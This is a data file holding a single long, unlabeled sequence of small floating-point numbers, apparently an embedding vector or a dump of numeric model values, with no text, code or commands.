-0.012124679982662201, -0.00042361317900940776, 0.005043432116508484, -0.015037668868899345, 0.003762611420825124, -0.011485866270959377, 0.01602144166827202, -0.010751230642199516, -0.009288348257541656, -0.006995007395744324, 0.007435788866132498, -0.022818416357040405, 0.022409576922655106, 0.028235554695129395, -0.00392231484875083, -0.0036252664867788553, 0.004359901882708073, 0.00896255299448967, 0.028618844226002693, -0.012974301353096962, 0.029410971328616142, -0.027162348851561546, -0.02280564047396183, 0.03204288333654404, 0.021706881001591682, -0.015599824488162994, 0.01807842031121254, -0.006522285286337137, 0.014731038361787796, -0.016404729336500168, -0.007205815985798836, -0.0034048757515847683, -0.010048535652458668, -0.006487150676548481, -0.017912330105900764, 0.03850767761468887, 0.002705374965444207, 0.012137455865740776, 0.021706881001591682, 0.010463764891028404, -0.008419561199843884, -0.005017879884690046, -0.005816396791487932, 0.007569939363747835, 0.003478339407593012, 0.003433622419834137, -0.00186214130371809, -0.017401278018951416, 0.004337543621659279, 0.0046984730288386345, 0.026932375505566597, -0.014066672883927822, -0.006943902466446161, -0.04745106399059296, -0.020224833860993385, 0.018295617774128914, -0.01995653286576271, -0.013402306474745274, 0.021540790796279907, 0.01156891230493784, -0.007742419373244047, -0.01319788582623005, -0.03002423234283924, -0.012048021890223026, -0.01998208463191986, 0.03559468686580658, 0.0015930411173030734, 0.02237124741077423, 0.00028566940454766154, 0.013977238908410072, -0.019279390573501587, 0.026497982442378998, 0.009812175296247005, 0.03416374325752258, 0.0015738767106086016, 0.01133893895894289, -0.01489713042974472, 0.0028890338726341724, -0.027826715260744095, 0.011153683066368103, 0.006720317527651787, -0.01139004435390234, 0.002730927662923932, -0.027494531124830246, 0.005525736603885889, 0.007953227497637272, 0.004340737592428923, 0.0035869376733899117, 0.0057014101184904575, -0.012392980977892876, 0.016123652458190918, 0.018295617774128914, 0.026370219886302948, -0.007193039637058973, -0.026497982442378998, 0.01697966270148754, 0.03416374325752258, -0.010917321778833866, -0.00914142094552517, 0.019228285178542137, -0.024185478687286377, 0.010125193744897842, -0.0066244956105947495, -0.0026654491666704416, 0.004752772394567728, 0.006662824656814337, -0.011498642154037952, -0.00999104231595993, 0.029308762401342392, 0.011913871392607689, -0.021885748952627182, -0.014386079274117947, -0.028184449300169945, 0.03137851879000664, -0.0028251525945961475, -0.02178354002535343, 0.023355020210146904, 0.006068727932870388, 0.013593950308859348, -0.03403598070144653, 0.028388870880007744, 0.01964990235865116, -0.01705631986260414, 0.0012041634181514382, 0.021068068221211433, 0.02966649830341339, 0.005152030847966671, 0.016315296292304993, -0.00910309236496687, -0.009524708613753319, 0.00026251241797581315, -0.026242457330226898, 0.01741405576467514, -0.00008314556180266663, 0.022179603576660156, -0.001985112903639674, -0.0062252371571958065, -0.011766944080591202, -0.028388870880007744, -0.0013343216851353645, -0.006598942913115025, 0.0009190928540192544, -0.005637528840452433, 0.0031206037383526564, -0.01715853065252304, -0.015753140673041344, -0.005781261716037989, -0.013772818259894848, -0.022971732541918755, 0.01554872002452612, 0.010700125247240067, -0.028388870880007744, 0.0034815333783626556, 0.00026510757743380964, 0.01551039144396782, -0.014398855157196522, 0.026702402159571648, -0.004139511380344629, 0.010074088349938393, -0.014961011707782745, -0.024389898404479027, 0.00744856521487236, -0.021349146962165833, -0.03204288333654404, 0.018270066007971764, 0.012437698431313038, 0.008042661473155022, -0.005691828206181526, 0.013862252235412598, 0.028542185202240944, -0.020531464368104935, 0.00035154703073203564, 0.022026289254426956, -0.0068544684909284115, 0.003433622419834137, -0.0019547692500054836, 0.013990014791488647, -0.007141934707760811, -0.02565474808216095, -0.009160584770143032, 0.011230341158807278, -0.00216398062184453, 0.018244512379169464, 0.00896255299448967, 0.004829430021345615, -0.022920627146959305, -0.011837213300168514, -0.013568397611379623, -0.00012406955647747964, 0.022179603576660156, -0.01622586138546467, 0.0025344924069941044, 0.01736295036971569, -0.018474485725164413, -0.0012664477108046412, -0.006726705934852362, -0.004998715594410896, -0.008310963399708271, 0.016532491892576218, -0.009186137467622757, 0.01579146832227707, 0.012584625743329525, -0.0010540422517806292, -0.007078053429722786, 0.008675087243318558, -0.010783171281218529, 0.022435128688812256, -0.032375067472457886, 0.012373817153275013, -0.0025919857434928417, -0.005385197699069977, 0.028695501387119293, 0.0012001708382740617, 0.011536971665918827, 0.009064762853085995, 0.015472061932086945, -0.021464131772518158, 0.003131783101707697, -0.008004332892596722, -0.00017457574722357094, -0.0016289743361994624, 0.019036641344428062, -0.006142191588878632, 0.0025488657411187887, 0.05647110939025879, -0.018551142886281013, -0.02331669069826603, 0.008898671716451645, -0.00784462969750166, -0.029053237289190292, -0.020838094875216484, -0.026242457330226898, 0.002317295875400305, 0.003507085843011737, 0.0063114771619439125, 0.0009390558116137981, -0.01797621138393879, 0.01544650923460722, 0.002336460165679455, -0.010489317588508129, 0.008355679921805859, -0.021540790796279907, -0.010304061695933342, 0.026523536071181297, 0.03625905141234398, 0.018972760066390038, 0.01489713042974472, -0.016404729336500168, 0.015561495907604694, -0.01720963418483734, 0.0029688857030123472, -0.020786989480257034, 0.010680961422622204, -0.013338425196707249, 0.004727219697088003, -0.008592041209340096, -0.03462368994951248, 0.006688376888632774, 0.009384170174598694, 0.017861224710941315, 0.0037849696818739176, -0.0009398543043062091, 0.019483810290694237, 0.013466187752783298, -0.020327044650912285, -0.02283119410276413, -0.037153393030166626, -0.012022469192743301, -0.00045635236892849207, 0.015165431424975395, -0.003935090731829405, 0.010431824252009392, -0.017605699598789215, 0.023125046864151955, 0.01128783356398344, 0.028874369338154793, -0.017350174486637115, 0.004497246816754341, -0.021591894328594208, 0.01229077111929655, -0.007154711056500673, -0.003440010594204068, 0.00035454146564006805, -0.028593290597200394, 0.013159557245671749, -0.0076465969905257225, 0.013172334060072899, 0.009186137467622757, 0.010668184608221054, -0.0008464278653264046, -0.012603789567947388, -0.014207211323082447, -0.043464869260787964, -0.021016962826251984, 0.009288348257541656, -0.01016991026699543, 0.01764402724802494, 0.006707541644573212, 0.006630884017795324, 0.023878848180174828, -0.003392099402844906, 0.013453411869704723, -0.04512578248977661, -0.002325281035155058, 0.008189588785171509, -0.010022982954978943, -0.023712756112217903, 0.013025406748056412, -0.006458404008299112, -0.005924995057284832, 0.027162348851561546, 0.012450474314391613, -0.011613628827035427, 0.003095051273703575, 0.022051841020584106, -0.0033409944735467434, -0.009192525409162045, -0.023789413273334503, 0.016328072175383568, 0.007141934707760811, -0.02984536439180374, -0.0027101661544293165, 0.008374844677746296, 0.018704459071159363, 0.0034368163906037807, -0.003523056162521243, 0.0004759160219691694, -0.006375358439981937, 0.0250925924628973, -0.011441148817539215, 0.0244282279163599, -0.009563037194311619, 0.010923710651695728, -0.001676885411143303, 0.04037301242351532, 0.019381601363420486, 0.03625905141234398, 0.009844115935266018, 0.00019234274805057794, 0.02499038353562355, -0.004963580518960953, -0.011830825358629227, -0.022128498181700706, 0.029436524957418442, -0.0002990445645991713, -0.0026478818617761135, 0.007761583663523197, 0.011798884719610214, -0.004375872202217579, -0.003440010594204068, -0.017861224710941315, 0.03523695096373558, 0.004727219697088003, -0.006423269398510456, -0.010470152832567692, 0.003593325847759843, -0.028567738831043243, -0.013312872499227524, -0.011313386261463165, -0.015906454995274544, 0.005592811852693558, -0.020352596417069435, 0.014283869415521622, 0.008828402496874332, 0.0032339931931346655, -0.02981981262564659, -0.04021969437599182, -0.003388905432075262, -0.010157134383916855, 0.006464792415499687, -0.010783171281218529, 0.010987591929733753, -0.010834276676177979, 0.012712388299405575, 0.023252809420228004, 0.005465049296617508, -0.023252809420228004, -0.0019212315091863275, 0.00019623551634140313, -0.027494531124830246, -0.0024706111289560795, -0.02565474808216095, 0.005800426471978426, 0.022000735625624657, -0.012118291109800339, -0.015829797834157944, -0.0006284327246248722, -0.004197004251182079, -0.002662255195900798, -0.009761069901287556, -0.016391953453421593, -0.021885748952627182, -0.00921807810664177, 0.004401424899697304, 0.0007346355123445392, 0.012143843807280064, 0.017120201140642166, -0.00030802786932326853, 0.023201705887913704, 0.005065790843218565, -0.01787400059401989, -0.01558704860508442, 0.013696161098778248, -0.010195462964475155, -0.014437184669077396, 0.03556913509964943, 0.016264190897345543, 0.00757632777094841, 0.00003406173345865682, -0.017759013921022415, 0.002331669209524989, 0.01524208951741457, -0.028465528041124344, 0.02224348485469818, 0.02219237945973873, 0.008240694180130959, 0.016647478565573692, 0.0037594172172248363, -0.00887311901897192, -0.020940305665135384, -0.02095308154821396, -0.007109994068741798, -0.007940451614558697, 0.007180263288319111, -0.012188561260700226, 0.023814966902136803, 0.003353770822286606, -0.016481388360261917, 0.016353623941540718, 0.012872091494500637, 0.003497503697872162, -0.006943902466446161, 0.032400619238615036, 0.018678905442357063, 0.010891770012676716, 0.0035869376733899117, 0.012444086372852325, 0.0011482671834528446, 0.01319788582623005, 0.001985112903639674, 0.024262135848402977, 0.013772818259894848, -0.011984140612185001, -0.0035006979014724493, -0.017835672944784164, 0.01805286854505539, 0.015037668868899345, 0.005781261716037989, -0.013606727123260498, 0.002625523367896676, 0.0025584478862583637, 0.014820472337305546, -0.0038041342049837112, 0.008770909160375595, -0.000510651501826942, -0.0022422352340072393, 0.005439496599137783, -0.00045715089072473347, 0.005819590762257576, -0.014513841830193996, 0.004957192577421665, -0.018781116232275963, -0.0018270064610987902, 0.0007078851922415197, 0.006410493049770594, -0.005206329748034477, -0.02087642438709736, -0.00019334089301992208, 0.0030407521408051252, 0.016762465238571167, 0.009096703492105007, -0.004500440787523985, -0.002981661818921566, 0.008342904038727283, 0.011140907183289528, -0.004557934124022722, 0.014475513249635696, 0.005231882445514202, 0.00454515777528286, 0.02064645104110241, -0.010374330915510654, -0.014373303391039371, 0.0016010262770578265, 0.005647111218422651, -0.007173875346779823, -0.0044493358582258224, 0.025782510638237, -0.002385968342423439, -0.004778324626386166, -0.01064263191074133, 0.009812175296247005, -0.0040309131145477295, 0.009358617477118969, 0.01581702195107937, 0.003222813829779625, -0.020224833860993385, 0.0028427198994904757, 0.006848080549389124, -0.006161355879157782, 0.00783185288310051, 0.0031285888981074095, -0.010764006525278091, 0.016570821404457092, 0.0015331523027271032, 0.0011394835310056806, 0.03431706130504608, -0.005404361989349127, -0.003459174884483218, 0.01977766491472721, 0.00007615853974130005, 0.01043821219354868, 0.009173361584544182, -0.017401278018951416, 0.00636897049844265, -0.0008879507076926529, -0.0063881347887218, -0.006362582091242075, -0.018793892115354538, 0.019790440797805786, 0.0027980029117316008, -0.021438580006361008, 0.0013303289888426661, -0.008381232619285583, 0.011294222436845303, -0.0005697417655028403, -0.026779061183333397, -0.007544387131929398, -0.007729643024504185, -0.014232764020562172, 0.009083927609026432, -0.013938910327851772, -0.032809458673000336, -0.003919120412319899, 0.002005874179303646, 0.02288229763507843, -0.02295895665884018, 0.0030663046054542065, -0.011524194851517677, -0.022843969985842705, -0.009077539667487144, -0.012923196889460087, -0.004474888555705547, 0.015267642214894295, -0.0008639952284283936, 0.007550775073468685, 0.00310463341884315, -0.018321169540286064, -0.0037945520598441362, 0.015216536819934845, 0.038737647235393524, -0.012361040338873863, 0.002901810221374035, -0.014526618644595146, 0.005155224818736315, -0.007863793522119522, 0.00041562801925465465, 0.012124679982662201, -0.002492969622835517, -0.0027900177519768476, 0.003131783101707697, 0.02313782460987568, -0.011958587914705276, -0.038252148777246475, 0.009166973643004894, 0.001162640517577529, -0.0130317946895957, 0.0017982599092647433, 0.0017631251830607653, 0.007167486939579248, 0.053200386464595795, -0.027775609865784645, 0.00505940243601799, -0.013951686210930347, 0.003935090731829405, 0.025693077594041824, -0.01502489298582077, 0.008432338014245033, -0.009403333999216557, 0.019113298505544662, -0.013811146840453148, -0.0014165688771754503, 0.003513474017381668, -0.00575251504778862, 0.0032691280357539654, -0.003379323286935687, -0.006238013505935669, -0.01031044963747263, -0.00772325461730361, -0.009358617477118969, 0.022971732541918755, 0.006567002274096012, -0.014756591059267521, 0.019994862377643585, -0.0019004701171070337, 0.018193406984210014, 0.002820361405611038, 0.02234569564461708, 0.0016401535831391811, -0.012444086372852325, 0.022792864590883255, 0.006266760174185038, 0.006480762735009193, 0.0038360748440027237, 0.01540818065404892, 0.013012629933655262, 0.0015139878960326314, -0.008310963399708271, 0.0037689993623644114, 0.03015199489891529, -0.025948602706193924, 0.010227403603494167, 0.024670975282788277, 0.005369227379560471, -0.022997284308075905, 0.022013511508703232, -0.0035358325112611055, -0.006790587212890387, -0.006975843105465174, -0.01715853065252304, 0.01319788582623005, -0.011639181524515152, -0.022307366132736206, -0.013913357630372047, 0.005883472040295601, -0.0030024233274161816, 0.006905573420226574, -0.009856891818344593, 0.00003461071537458338, -0.02504148706793785, 0.00021739621297456324, -0.004666532389819622, 0.010827888734638691, -0.008553712628781796, 0.018678905442357063, 0.00324836652725935, 0.005282987374812365, 0.007480505853891373, 0.006493539083749056, -0.027903372421860695, -0.016609150916337967, 0.009109480306506157, 0.003392099402844906, 0.02026316337287426, 0.01987987570464611, -0.017452383413910866, 0.005330898333340883, 0.00852815993130207, -0.0013159557711333036, 0.014334973879158497, -0.007352742832154036, 0.0022773700766265392, 0.011204788461327553, -0.008687863126397133, 0.024019386619329453, -0.00504023814573884, 0.002274175873026252, -0.006008040625602007, -0.0031701119150966406, 0.011025920510292053, 0.0028235556092113256, -0.015382627956569195, 0.02372553199529648, -0.004749577958136797, -0.002936944831162691, 0.006241207476705313, 0.006087892223149538, -0.007742419373244047, 0.023917175829410553, 0.005343674682080746, -0.024185478687286377, -0.04131845384836197, -0.015574272722005844, 0.00644562765955925, 0.022613996639847755, 0.01810397394001484, 0.029538733884692192, 0.005385197699069977, -0.000018702761735767126, -0.017273515462875366, 0.006116638891398907, -0.020199282094836235, 0.001712020137347281, -0.013223438523709774, 0.03929980471730232, -0.004663338419049978, -0.016583597287535667, -0.003548608860000968, 0.00036412366898730397, 0.0071227699518203735, -0.005273404996842146, 0.005468243267387152, -0.032809458673000336, 0.01493545901030302, -0.0064743743278086185, 0.010291284881532192, -0.015344299376010895, 0.007212203927338123, -0.0064743743278086185, -0.00502107385545969, 0.0006947096553631127, -0.0022677876986563206, 0.006586167030036449, -0.019611572846770287, 0.006758646573871374, 0.011620016768574715, 0.009550261311233044, 0.028848815709352493, -0.01741405576467514, 0.0013958074850961566, 0.00489331129938364, -0.00917974952608347, 0.0015650929417461157, -0.003088663099333644, 0.0010987591231241822, -0.008183200843632221, 0.024607094004750252, -0.012910420075058937, -0.01000381913036108, -0.008764521218836308, 0.026676850393414497, -0.018985535949468613, -0.006480762735009193, 0.0009909593500196934, 0.027136795222759247, 0.005790844094008207, -0.014322197996079922, 0.00978662259876728, 0.03027975745499134, -0.003459174884483218, -0.0009917579591274261, 0.007218592334538698, -0.004027719143778086, -0.020978635177016258, 0.004915669560432434, -0.001720005297102034, -0.005215912126004696, 0.013287319801747799, -0.0013159557711333036, -0.004168258048593998, -0.019368823617696762, 0.0018413797952234745, -0.0019387989304959774, -0.015804246068000793, 0.0007146725547499955, -0.027162348851561546, -0.010450988076627254, -0.0038744036573916674, 0.01774623803794384, 0.007518834434449673, 0.004688890650868416, 0.007014171686023474, 0.006065533962100744, -0.00925640668720007, -0.02046758309006691, 0.004708055406808853, -0.037868861109018326, 0.0005645513883791864, -0.010738454759120941, -0.00428963266313076, -0.008937000297009945, 0.022690653800964355, 0.03137851879000664, -0.014386079274117947, 0.010457376018166542, -0.009620530530810356, 0.006650048308074474, -0.020250387489795685, -0.009569426067173481, -0.014117777347564697, -0.001553115202113986, -0.010968427173793316, -0.013542845845222473, -0.0024897754192352295, -0.002635105513036251, 0.003622072283178568, -0.005362838972359896, -0.01746515929698944, -0.02966649830341339, 0.009524708613753319, 0.01764402724802494, -0.02216682769358158, -0.025258684530854225, 0.03421485051512718, -0.0059122187085449696, -0.011779719963669777, 0.009281959384679794, 0.000040474820707459, 0.014041120186448097, -0.013427859172224998, 0.0021496072877198458, -0.009524708613753319, 0.00002424247213639319, -0.01964990235865116, -0.005924995057284832, 0.012846538797020912, -0.00755716348066926, 0.016685808077454567, 0.03429150581359863, -0.02067200466990471, 0.0050530144944787025, -0.032528381794691086, -0.01774623803794384, 0.008349291980266571, 0.00567585788667202, 0.014194435440003872, 0.029589839279651642, -0.048243194818496704, -0.0029305568896234035, -0.02010984718799591, -0.020608123391866684, 0.010559586808085442, -0.004008554387837648, 0.0061198328621685505, -0.015561495907604694, -0.008291798643767834, 0.016724135726690292, 0.018883327022194862, -0.0017774985171854496, -0.023636098951101303, 0.008202364668250084, -0.014628828503191471, -0.027877820655703545, 0.01126228179782629, 0.008534547872841358, -0.0035422206856310368, -0.013415083289146423, -0.02987091802060604, -0.010981203056871891, -0.017017990350723267, 0.00840039737522602, -0.0021416221279650927, -0.028056686744093895, -0.017912330105900764, 0.010412659496068954, 0.002451446605846286, -0.013095675967633724, 0.025693077594041824, 0.028669947758316994, -0.008841178379952908, 0.005509766284376383, -0.007621044758707285, 0.010559586808085442, 0.00896255299448967, 0.015472061932086945, -0.0023620128631591797, 0.022205155342817307, 0.027085691690444946, -0.007640209048986435, 0.01987987570464611, 0.005589617881923914, -0.009537485428154469, -0.011358103714883327, 0.022460682317614555, 0.011166459880769253, 0.01221411395817995, -0.005653499159961939, 0.007020560093224049, 0.016468610614538193, -0.008342904038727283, -0.0013111646985635161, -0.037741098552942276, -0.02224348485469818, 0.019087746739387512, 0.021387474611401558, 0.011805272661149502, 0.0023572216741740704, 0.021821867674589157, -0.004867758601903915, -0.007978780195116997, 0.0023827741388231516, -0.01112174242734909, -0.00973551720380783, -0.0030647076200693846, -0.024479331448674202, 0.015178208239376545, 0.013581174425780773, 0.014603275805711746, -0.03687231242656708, 0.020684780552983284, -0.003363352967426181, -0.020914752036333084, -0.03017754852771759, 0.004963580518960953, 0.003503891872242093, -0.005378809291869402, 0.008451501838862896, -0.01957324519753456, -0.006525479722768068, -0.010336002334952354, -0.003638042602688074, 0.009192525409162045, 0.006289118435233831, -0.0023300722241401672, 0.004727219697088003, 0.014437184669077396, -0.0024450586643069983, -0.002342848340049386, -0.022102946415543556, -0.001978724729269743, -0.009275571443140507, -0.01095565129071474, 0.011939424090087414, -0.03454703092575073, -0.005647111218422651, -0.01833394728600979, 0.004969968926161528, -0.012584625743329525, 0.005120089743286371, -0.016890227794647217, -0.021872973069548607, -0.019509363919496536, 0.002255011582747102, -0.01103230845183134, -0.03091857209801674, -0.01764402724802494, 0.012386593036353588, -0.010776783339679241, -0.01931772008538246, 0.0073335785418748856, -0.00759549206122756, -0.027417873963713646, -0.016391953453421593, -0.005429914686828852, -0.017529042437672615, 0.002813973231241107, -0.026702402159571648, -0.016903003677725792, -0.01536985207349062, 0.007256920915096998, -0.0025792093947529793, 0.005209523718804121, 0.01944548264145851, -0.006943902466446161, 0.006694765295833349, -0.0073782955296337605, -0.005142448469996452, -0.0041554816998541355, 0.015395404770970345, -0.003612490138038993, -0.007525222841650248, 0.011326163075864315, 0.003254754701629281, -0.023278363049030304, -0.021349146962165833, -0.007180263288319111, -0.019586021080613136, -0.0006156564923003316, -0.028031134977936745, -0.015829797834157944, -0.00428963266313076, 0.026472430676221848, -0.018627800047397614, 0.008074602112174034, 0.006918349768966436, 0.03441926836967468, -0.017171306535601616, -0.014820472337305546, 0.028312213718891144, -0.012003305368125439, -0.01959879696369171, 0.003912732470780611, -0.002793211955577135, -0.011115354485809803, 0.00977384578436613, 0.010840664617717266, -0.003398487577214837, -0.037919968366622925, -0.025974156334996223, -0.012967913411557674, 0.0008703833445906639, -0.024108819663524628, 0.0019020671024918556, 0.005656693130731583, 0.027111243456602097, 0.004861370660364628, -0.006024010945111513, 0.00443655950948596, 0.013938910327851772, 0.008061826229095459, 0.002235847059637308, 0.013312872499227524, 0.009301124140620232, 0.009154196828603745, -0.0015028086490929127, 0.006899185478687286, -0.025948602706193924, 0.03608018532395363, -0.008080990053713322, 0.0045739044435322285, -0.0043630958534777164, 0.0003862825105898082, 0.014181658625602722, 0.00923085492104292, -0.00032339931931346655, 0.01029767282307148, -0.03091857209801674, -0.02272898331284523, -0.0006875229883007705, -0.002975273644551635, 0.02267787791788578, -0.00014353339793160558, -0.01581702195107937, 0.00043878500582650304, -0.005359645001590252, -0.01133893895894289, 0.0031812910456210375, 0.0046984730288386345, 0.018755562603473663, 0.00023396543110720813, -0.027852267026901245, -0.013875028118491173, -0.029002131894230843, 0.01594478450715542, 0.011958587914705276, 0.014105001464486122, -0.01807842031121254, -0.013159557245671749, 0.0254758819937706, -0.019560469314455986, 0.0016657061642035842, -0.022639548406004906, 0.020786989480257034, 0.004787907004356384, -0.01810397394001484, 0.003433622419834137, -0.0005917009548284113, 0.008272634819149971, 0.016558045521378517, 0.017273515462875366, -0.000683530408423394, -0.007914898917078972, 0.021068068221211433, 0.002451446605846286, -0.011115354485809803, 0.00374344689771533, 0.011632793582975864, -0.005723768845200539, 0.00015401393466163427, -0.0014349347911775112, -0.007531610783189535, 0.022690653800964355, -0.0008727788808755577, -0.008125707507133484, 0.0010069297859445214, 0.009243630804121494, 0.000940652855206281, 0.01766958087682724, -0.0027165543287992477, 0.01700521446764469, -0.001881305710412562, 0.008406785316765308, 0.0030583194456994534, -0.013657831586897373, -0.002619135193526745, -0.0044237831607460976, -0.008930612355470657, -0.007997944951057434, -0.0023668038193136454, -0.02010984718799591, -0.012188561260700226, -0.014015567488968372, -0.0020106653682887554, -0.01962435059249401, -0.000709881482180208, -0.018551142886281013, 0.016289742663502693, -0.0032371871639043093, -0.033627141267061234, -0.022486234083771706, 0.001846170867793262, -0.0063306414522230625, 0.013134004548192024, -0.03725560009479523, -0.007250532973557711, -0.01146670151501894, 0.0025887915398925543, 0.03470034897327423, 0.00772325461730361, 0.00038428622065111995, 0.016762465238571167, -0.009454439394176006, -0.01139004435390234, -0.016072547063231468, 0.007640209048986435, -0.008176811970770359, 0.013415083289146423, -0.009339452721178532, -0.016519716009497643, 0.00022657915542367846, 0.004963580518960953, -0.019419929012656212, -0.003673177445307374, 0.0036476249806582928, -0.033499378710985184, 0.02016095258295536, -0.008457890711724758, -0.0060144285671412945, -0.0008528159814886749, -0.001890887855552137, -0.01718408241868019, -0.003131783101707697, 0.037868861109018326, 0.0018333946354687214, 0.0004288035270292312, -0.00034815334947779775, 0.007991556078195572, 0.0020969051402062178, -0.018730010837316513, -0.013581174425780773, -0.020940305665135384, 0.011690286919474602, -0.009486380033195019, -0.000017205542462761514, -0.012642118148505688, -0.0054139443673193455, -0.006199684925377369, 0.015127102844417095, 0.017784567549824715, 0.015433733351528645, -0.0032771131955087185, 0.008336516097187996, -0.027877820655703545, -0.00428963266313076, 0.0012536714784801006, -0.001863738289102912, 0.00878368504345417, 0.0014437184436246753, -0.0031174097675830126, -0.011888318695127964, -0.0033601587638258934, -0.021489685401320457, 0.011421984992921352, 0.028925474733114243, -0.004599457141011953, -0.009064762853085995, -0.010700125247240067, 0.01519098412245512, -0.00040684433770366013, -0.010086864233016968, -0.004104376304894686, -0.00022358472051564604, 0.029436524957418442, -0.0005889061721973121, 0.00024314837355632335, -0.015957560390233994, -0.0032930835150182247, -0.008943388238549232, -0.019292166456580162, 0.010074088349938393, -0.0032803071662783623, 0.006103862542659044, 0.004053271375596523, -0.001197775243781507, 0.016161980107426643, -0.0018653352744877338, -0.01818063110113144, 0.0008847566787153482, 0.0016090114368125796, 0.015127102844417095, 0.010949262417852879, 0.0027117631398141384, -0.015983112156391144, -0.012156620621681213, -0.008662310428917408, -0.012150231748819351, 0.006193296518176794, -0.01497378759086132, 0.0015395404770970345, -0.004813459701836109, -0.007851017639040947, -0.019713783636689186, 0.020097071304917336, 0.018921654671430588, 0.009818563237786293, -0.004066047724336386, -0.009486380033195019, 0.011038696393370628, 0.021757986396551132, 0.003638042602688074, 0.004446141887456179, 0.0014429199509322643, 0.01795065775513649, -0.0001912447769427672, 0.014999340288341045, 0.0035869376733899117, 0.005075373221188784, -0.017196858301758766, -0.0002850705059245229, 0.012565460987389088, 0.010834276676177979, 0.003061513649299741, 0.0019148433348163962, 0.009550261311233044, 0.013351201079785824, -0.005564065184444189, -0.018397828564047813, -0.032247304916381836, -0.007601880468428135, 0.019637126475572586, 0.02341890148818493, 0.0014940249966457486, -0.016494164243340492, 0.021924078464508057, -0.018998311832547188, -0.006359388120472431, -0.006442433688789606, -0.019049417227506638, -0.005940965376794338, 0.013172334060072899, 0.0034208460710942745, -0.012789045460522175, 0.0008440322708338499, 0.00923085492104292, -0.009959101676940918, 0.016621926799416542, 0.007033336441963911, -0.014616051688790321, 0.018998311832547188, -0.006039981264621019, 0.009320288896560669, 0.012999854050576687, -0.0052223000675439835, 0.004037301056087017, -0.004216169007122517, 0.0006400112179107964, -0.01581702195107937, 0.002676628530025482, -0.016685808077454567, -0.0029481241945177317, -0.024134373292326927, 0.0016976468032225966, -0.003548608860000968, 0.011421984992921352, 0.010540422052145004, 0.016110876575112343, 0.021617447957396507, 0.01710742525756359, -0.0052414643578231335, 0.015599824488162994, 0.0005557677359320223, -0.016328072175383568, 0.003931896761059761, -0.0023492365144193172, -0.004548351746052504, 0.0035997137892991304, -0.010732065886259079, -0.0063498057425022125, -0.009678023867309093, 0.0021879361011087894, 0.0015658915508538485, 0.025795288383960724, -0.019062193110585213, 0.016826346516609192, -0.007474117446690798, 0.011402820236980915, 0.008087378926575184, -0.006707541644573212, 0.015178208239376545, 0.006365776062011719, 0.016430282965302467, -0.00905198697000742, 0.01038710679858923, -0.01731184497475624, 0.008572876453399658, -0.004583486821502447, -0.0012943957699462771, -0.012163008563220501, 0.003032766981050372, 0.04103737697005272, -0.020965857431292534, -0.01772068627178669, -0.04106292873620987, 0.005276599433273077, -0.006662824656814337, 0.013772818259894848, 0.023176152259111404, -0.009582201950252056, 0.0008991299546323717, 0.01542095746845007, 0.013977238908410072, 0.015395404770970345, 0.004053271375596523, 0.02090197615325451, -0.006931126117706299, -0.011473089456558228, 0.003554997034370899, 0.0070844413712620735, -0.017656804993748665, 0.014347750693559647, -0.010106028988957405, 0.02255011536180973, -0.01540818065404892, 0.015612601302564144, 0.015727587044239044, -0.00857926532626152, -0.011051473207771778, -0.021579118445515633, -0.0028986160177737474, 0.014322197996079922, 0.0005130470381118357, 0.014079448767006397, 0.001338314265012741, -0.0009366602753289044, 0.001985112903639674, 0.008700639009475708, 0.008790072984993458, -0.009479992091655731, 0.006506314966827631, -0.009978266432881355, 0.0011810064315795898, 0.0018669323762878776, 0.00874535646289587, 0.04139511287212372, 0.016034217551350594, -0.01736295036971569, -0.023073943331837654, -0.029180999845266342, 0.016404729336500168, -0.0012728358851745725, -0.013402306474745274, -0.015599824488162994, -0.007537998724728823, -0.014232764020562172, 0.016149204224348068, 0.0007665761513635516, -0.0248626209795475, 0.002494566608220339, 0.013760042376816273, 0.001162640517577529, -0.022205155342817307, 0.0007841435144655406, 0.005084955133497715, 0.027980029582977295, 0.009895220398902893, -0.017247963696718216, 0.005164806731045246, 0.011447537690401077, 0.0014628828503191471, 0.0009885638719424605, -0.026932375505566597, 0.021604672074317932, -0.011000367812812328, -0.014513841830193996, 0.001339911250397563, -0.006512703374028206, -0.028669947758316994, -0.0016497357282787561, -0.004551546182483435, -0.005286181345582008, 0.013223438523709774, -0.007946839556097984, 0.022741759195923805, 0.006241207476705313, 0.012022469192743301, -0.00023236840206664056, 0.007154711056500673, -0.02278008870780468, -0.0019675453659147024, 0.007525222841650248, 0.002398744458332658, -0.0015467271441593766, -0.01581702195107937, -0.013747265562415123, 0.0004906886024400592, 0.004736802075058222, 0.022946178913116455, 0.01130061037838459, 0.0016106084221974015, -0.009722741320729256, -0.01515265554189682, -0.019407153129577637, 0.008151260204613209, -0.002786823781207204, -0.01604699343442917, -0.0021607866510748863, -0.021732434630393982, 0.0011746182572096586, -0.013223438523709774, 0.003772193565964699, -0.01484602503478527, 0.006796975154429674, 0.021387474611401558, -0.01718408241868019, 0.005455466918647289, -0.025079816579818726, -0.013095675967633724, 0.005560871213674545, -0.028593290597200394, -0.00549698993563652, 0.011128130368888378, -0.019368823617696762, -0.012699611485004425, -0.0021240548230707645, -0.025182027369737625, -0.006937514059245586, -0.005800426471978426, 0.0054139443673193455, -0.01510155014693737, 0.00870702788233757, 0.00921807810664177, 0.024594318121671677, 0.013466187752783298, 0.017069095745682716, -0.008349291980266571, 0.00012247251288499683, 0.001216141157783568, 0.00857926532626152, -0.024466555565595627, 0.011786108836531639, 0.015804246068000793, -0.018576696515083313, 0.003487921552732587, -0.011102577671408653, 0.013019018806517124, 0.018870549276471138, -0.003970225807279348, 0.0054139443673193455, -0.017861224710941315, 0.0062092668376863, 0.0043630958534777164, 0.0051168957725167274, 0.010629856027662754, -0.016149204224348068, -0.005592811852693558, 0.015804246068000793, -0.006758646573871374, -0.004353513941168785, 0.019496586173772812, 0.018934430554509163, 0.002849108073860407, 0.0020729496609419584, 0.000098716642241925, 0.0011386850383132696, 0.021630223840475082, 0.017529042437672615, -0.03165959566831589, 0.028567738831043243, 0.013836699537932873, -0.013070123270154, 0.002855496248230338, -0.010687349364161491, -0.014411631971597672, 0.023150600492954254, -0.011805272661149502, 0.010853440500795841, 0.012693223543465137, 0.0012089544907212257, -0.00761465635150671, 0.0009143017814494669, -0.007218592334538698, -0.0012999854516237974, -0.002724539488554001, -0.022154051810503006, -0.010712902061641216, -0.018321169540286064, -0.019100522622466087, -0.013440635055303574, -0.01488435361534357, -0.007365519180893898, -0.012872091494500637, 0.013134004548192024, -0.00017647222557570785, 0.009326676838099957, -0.007953227497637272, 0.028184449300169945, 0.006650048308074474, 0.008994493633508682, -0.007621044758707285, 0.01133893895894289, -0.007474117446690798, 0.01705631986260414, -0.000465934572275728, 0.03452147915959358, 0.001811036141589284, -0.003676371416077018, 